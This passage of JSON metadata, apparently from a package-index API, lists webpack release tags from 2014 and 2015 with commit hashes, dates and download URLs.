"download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe